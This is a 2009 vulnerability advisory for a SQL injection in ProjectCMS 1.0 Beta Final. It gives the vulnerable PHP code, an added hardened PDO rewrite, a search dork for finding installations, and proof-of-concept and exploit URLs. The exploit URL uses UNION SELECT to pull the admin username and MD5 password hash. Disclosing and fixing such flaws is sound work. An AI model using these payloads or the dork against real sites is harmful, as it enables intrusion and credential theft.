SQL INJECTION (SQLi) VULNERABILITY--ProjectCMS v1.0 Beta Final-->

2009-05-01T00:00:00
ID SECURITYVULNS:DOC:21756
Type securityvulns
Reporter Securityvulns
Modified 2009-05-01T00:00:00

Description



CMS INFORMATION:

-->WEB: http://projectcms.org/
-->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.0_BETA.zip
-->DEMO: http://projectcms.org
-->CATEGORY: CMS / Portal
-->DESCRIPTION: ProjectCMS is an open source community project to create a simple content management system with an easy to follow install...
-->RELEASED: 2009-04-29

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "Powered by ProjectCMS"
-->CATEGORY: SQL INJECTION VULNERABILITY
-->AFFECT VERSION: 1.0 Beta Final (maybe <= ?)
-->Discovered Bug date: 2009-04-29
-->Reported Bug date: 2009-04-29
-->Fixed bug date: N/A
-->Info patch: N/A
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to all of you for putting up with me! (Love you, little one!)

////////////////////////

SQL INJECTION (SQLi):

////////////////////////

<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>


VULN FILE:

    ...

    // The page serial number is taken straight from the query string.
    $sn=$_GET["sn"];

    // Only the empty case is handled; any other value passes through untouched.
    if ( $sn == "" ) {

            $sn = "1";
    }

    // $sn is interpolated directly into the query text. With magic_quotes_gpc=off
    // a single quote in the parameter closes the string literal, so the rest of
    // the parameter becomes SQL.
    $sql="select sn,pagename,linktext,pagecontent,metakeywords,metadescription from $content where sn='$sn'";

    // Query errors are printed to the page, so malformed input also reveals
    // MySQL error text.
    $result=mysql_query($sql,$connection) or die(mysql_error());

    ...
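The following is a hardened rewrite of the fragment above. It is an added example, not ProjectCMS code or a vendor patch. It assumes that "sn" is an integer page serial number (the code falls back to "1"), that $content holds a table name chosen by the application (the table names in the allow-list are assumed), and that a PDO connection to the same MySQL database is used, since the mysql_* functions in the original were removed in PHP 7. Connection details are placeholders.

```php
<?php
// Hardened version of the vulnerable index.php fragment (added example, not
// ProjectCMS code). Assumptions: "sn" is an integer page number, $content is
// an application-chosen table name, credentials below are placeholders.

$pdo = new PDO(
    'mysql:host=localhost;dbname=PLACEHOLDER_DB;charset=utf8mb4',
    'PLACEHOLDER_USER',
    'PLACEHOLDER_PASSWORD',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // Real server-side prepares: the value never travels inside the SQL text.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

// Assumed: the table name comes from application config, as $content did in
// the original. A table name cannot be a bound parameter, so it is checked
// against a fixed list instead of being interpolated blindly.
$content = 'content';
$allowed_tables = ['content', 'pages'];   // assumed table names
if (!in_array($content, $allowed_tables, true)) {
    http_response_code(500);
    exit('Invalid content table');
}

// Keep the original fallback for an empty value, then require a plain
// positive integer. This check alone rejects the quote-based input in the
// proof of concept, and it does not depend on magic_quotes_gpc.
$sn = $_GET['sn'] ?? '';
if ($sn === '') {
    $sn = '1';
}
$sn = filter_var($sn, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($sn === false) {
    http_response_code(400);
    exit('Invalid page');
}

// Bind the page number as data. Even if the integer check were loosened
// later, a bound parameter cannot change the structure of the query.
$sql = 'SELECT sn, pagename, linktext, pagecontent, metakeywords, metadescription '
     . "FROM `$content` WHERE sn = :sn";

try {
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':sn', $sn, PDO::PARAM_INT);
    $stmt->execute();
    $page = $stmt->fetch(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    // Log the detail server-side; the original's die(mysql_error()) printed
    // the MySQL error text to the visitor.
    error_log('content lookup failed: ' . $e->getMessage());
    http_response_code(500);
    exit('Database error');
}

if ($page === false) {
    http_response_code(404);
    exit('Page not found');
}

// $page['pagename'] etc. are now safe to pass on to the template layer
// (output escaping with htmlspecialchars() is still needed there).
```

Two layers are used on purpose: the integer validation documents what "sn" is allowed to be, and the prepared statement guarantees that whatever reaches the database is treated as a value rather than as query text. Either one stops the injection shown in the proof of concept; together they also cover a future change that relaxes the input check.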

PROOF OF CONCEPT:

http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,user(),5,6/*

Return --> the database user and the database name; the latter appears in the page title ;)


EXPLOIT:

http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,concat(username,0x3A3A3A,password),5,6+FROM+members+WHERE+memberid=1/*

Return --> username:::password (MD5 hash) of the admin, plus the database name (in the title too).

<<<-----------------------------EOF---------------------------------->>>

ENJOY IT!

*************

SPECIAL GREETZ TO: Str0ke, JosS, ...

*************

-------------------------------------------------------------------

*************

GREETZ TO: SPANISH H4ck3Rs community!

*************